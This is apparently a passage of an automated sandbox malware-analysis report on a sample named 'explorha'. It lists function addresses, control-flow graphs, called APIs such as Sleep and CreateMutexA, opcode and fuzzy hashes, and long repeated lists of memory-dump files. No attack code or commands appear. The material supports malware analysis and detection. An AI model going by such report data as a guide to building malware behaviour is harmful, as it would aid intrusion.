                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 46267013cebf408646c60c549fc19bbbb89a2da148a81531fdbaffcaaa3cff0b
                                                                                                      • Instruction ID: 2dc9432c89345e2af055f4b263e723bb83bbfcc836b404f05dd0a6875ebbb251
                                                                                                      • Opcode Fuzzy Hash: 46267013cebf408646c60c549fc19bbbb89a2da148a81531fdbaffcaaa3cff0b
                                                                                                      • Instruction Fuzzy Hash: 5B11A8322142049BEB089F6CDE89B6CB765FB81315F10421AE818EB3C9CB79A5808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A326 Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 281 86a326-86a33e 282 86a340-86a34c 281->282 283 86a36c-86a36e 281->283 284 86a362-86a369 call 87ecf8 282->284 285 86a34e-86a35c 282->285 286 86a370-86a377 283->286 287 86a379-86a381 call 8678b0 283->287 284->283 285->284 288 86a41e-86a458 call 8982fa Sleep CreateMutexA 285->288 290 86a3bb-86a3e6 call 879750 286->290 298 86a3b4-86a3b6 287->298 299 86a383-86a38b call 8678b0 287->299 301 86a45e-86a466 288->301 298->290 299->298 304 86a38d-86a395 call 8678b0 299->304 304->298 307 86a397-86a39f call 8678b0 304->307 307->298 310 86a3a1-86a3a9 call 8678b0 307->310 310->298 313 86a3ab-86a3b2 310->313 313->290
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 671922f1078a0ceb6448040c2e4685fe74c12e95f6bd05ad6ecc1048f5a501cf
                                                                                                      • Instruction ID: a27e467fd80c8805f45c48c1419b62b40e9d102c889aa25241e530895c48421c
                                                                                                      • Opcode Fuzzy Hash: 671922f1078a0ceb6448040c2e4685fe74c12e95f6bd05ad6ecc1048f5a501cf
                                                                                                      • Instruction Fuzzy Hash: 38215E313442059BFB1C6B6CCE8FB6C7663FB41705F254415E504EA3C5CA759D80CAAB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 261 869e1f-869e2b 262 869e41-869e6a call 87ecf8 261->262 263 869e2d-869e3b 261->263 269 869e6c-869e78 262->269 270 869e98-86a3e6 call 879750 262->270 263->262 264 86a40a 263->264 266 86a423-86a466 Sleep CreateMutexA 264->266 267 86a40a call 8982fa 264->267 267->266 273 869e8e-869e95 call 87ecf8 269->273 274 869e7a-869e88 269->274 273->270 274->264 274->273
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 1f769d7a56ffa58c4e5cb018f09464d3afd17def9b0581f35bb038a33fd504d5
                                                                                                      • Instruction ID: f363094d6c49f387a18e8b5c93bd28c9b9ef272d5e3d06ec6c3e2e361443f7f0
                                                                                                      • Opcode Fuzzy Hash: 1f769d7a56ffa58c4e5cb018f09464d3afd17def9b0581f35bb038a33fd504d5
                                                                                                      • Instruction Fuzzy Hash: C72187323002049BEB0CDB6CDD897ACB766FF85311F24421DE418EB3D8CBB6A5808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089EE4F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 314 89ee4f-89ee5a 315 89ee68-89ee6e 314->315 316 89ee5c-89ee66 314->316 318 89ee70-89ee71 315->318 319 89ee87-89ee98 RtlAllocateHeap 315->319 316->315 317 89ee9c-89eea7 call 898ba3 316->317 323 89eea9-89eeab 317->323 318->319 320 89ee9a 319->320 321 89ee73-89ee7a call 89b3e2 319->321 320->323 321->317 327 89ee7c-89ee85 call 89a459 321->327 327->317 327->319
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089BE33,00000001,00000364,00000006,000000FF,?,008A045F,?,00000004,00000000,?,?), ref: 0089EE91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 4a7445c6fe6718418ca29ae37ec269d450f59a894bb7aa7a30f0b95a3845c40e
                                                                                                      • Instruction ID: 4ba5df6ae60570d690653c069e1429baf3255095ee7701a90760bbdb86936bcc
                                                                                                      • Opcode Fuzzy Hash: 4a7445c6fe6718418ca29ae37ec269d450f59a894bb7aa7a30f0b95a3845c40e
                                                                                                      • Instruction Fuzzy Hash: BFF08232545229A69F21FAA69C05B6F7F99FF82770B1D8112BC18E6181CF71E80186E5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 00862DC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                      • String ID:
                                                                                                      • API String ID: 57040152-0
